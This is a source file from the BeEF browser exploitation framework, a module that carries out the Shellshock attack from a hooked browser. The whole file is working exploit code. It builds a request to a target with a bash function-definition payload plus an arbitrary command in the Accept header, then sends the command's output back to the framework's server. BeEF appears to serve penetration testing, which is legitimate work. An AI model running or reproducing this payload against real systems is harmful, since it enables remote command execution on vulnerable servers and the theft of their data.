beef/modules/exploits/shell_shocked/command.js

//
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

beef.execute(function () {
    try {
        var target = "<%=@Target%>";
        var command = "<%=@Bash_Command%>";
        var method = "<%=@method%>";
        var xhr = new XMLHttpRequest();
        xhr.open(method, target, true);
        xhr.onload = function () {
        };
        xhr.onreadystatechange = function () {
            if (xhr.readyState == 4 && xhr.status == 200) {
                beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+xhr.response);
            }
        }
        xhr.setRequestHeader("Accept", "() { test;};echo \"Content-type: text/plain\"; echo; echo; " + command);
        xhr.send(null);
    } catch (e){
        beef.net.send("<%= @command_url %>", <%= @command_id %>, "result= Something wrong "+e.message);
    }
});